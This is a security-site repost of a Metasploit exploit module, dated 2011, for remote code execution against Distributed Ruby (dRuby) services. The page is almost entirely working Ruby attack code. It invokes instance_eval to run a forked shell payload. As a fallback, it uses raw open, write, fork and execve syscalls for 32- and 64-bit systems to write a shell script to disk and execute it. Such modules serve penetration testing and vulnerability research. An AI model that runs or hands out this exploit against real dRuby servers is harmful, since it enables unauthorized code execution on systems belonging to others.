首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Distributed Ruby Send instance_eval/syscall Code Execution
来源:http://www.metasploit.com 作者:joernchen 发布时间:2011-03-29  

##
# $Id: drb_remote_codeexec.rb 12161 2011-03-27 20:00:06Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 def initialize(info = {})
  super(update_info(info, 
   'Name'           => 'Distributed Ruby Send instance_eval/syscall Code Execution',
   'Description'    => %q{
    This module exploits remote code execution vulnerabilities in dRuby
   },
   'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 12161 $',
   'References'     =>
    [
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Compat'      =>
      {
       'PayloadType' => 'cmd',
      },
     'Space'       => 32768,
    },
   'Platform'       => 'unix',
   'Arch'           => ARCH_CMD,
   'Targets'        => [[ 'Automatic', { }]],
   'DefaultTarget' => 0))

   
   register_options(
    [
     OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
    ], self.class)
 end

 def exploit
  puts payload.encoded
  serveruri = datastore['URI']
  DRb.start_service 
  p = DRbObject.new_with_uri(serveruri)
  class << p
   undef :send
  end
  begin
   print_status('trying to exploit instance_eval')
   p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")

  rescue SecurityError => e
   print_status('instance eval failed, trying to exploit syscall')
   filename = "." + Rex::Text.rand_text_alphanumeric(16)
   begin

    # syscall to decide wether it's 64 or 32 bit:
    # it's getpid on 32bit which will succeed, and writev on 64bit
    # which will fail due to missing args
    j = p.send(:syscall,20)
    # syscall open  
    i =  p.send(:syscall,8,filename,0700)
    # syscall write
    p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
    # syscall close
    p.send(:syscall,6,i)
    # syscall fork
    p.send(:syscall,2)
    # syscall execve
    p.send(:syscall,11,filename,0,0)

   # not vulnerable
   rescue SecurityError => e
   
    print_status('target is not vulnerable')

   # likely 64bit system
   rescue => e
    # syscall creat
    i = p.send(:syscall,85,filename,0700)
    # syscall write
    p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
    # syscall close
    p.send(:syscall,3,i)
    # syscall fork
    p.send(:syscall,57)
    # syscall execve
    p.send(:syscall,59,filename,0,0)
   end
  end
  print_status("payload executed from file #{filename}") unless filename.nil?
  print_status("make sure to remove that file") unless filename.nil?
  handler(nil)
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox Crash Handler
·Easy File Sharing Web Server 5
·Konqueror KDE 3.5 Crash Handle
·IDEAL Administration 2011 v11.
·jHTTPd 0.1a Directory Traversa
·Rumble 0.25.2232 Denial of Ser
·GOM Player 2.1.28.5039 - AVI D
·Windows Explorer 6.0.2900.5512
·Winamp 5.61 - AVI DoS PoC
·FengOffice 1.7.4 Shell Upload
·Easy File Sharing Web Server 5
·FLVPlayer4Free 2.9 Stack Overf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved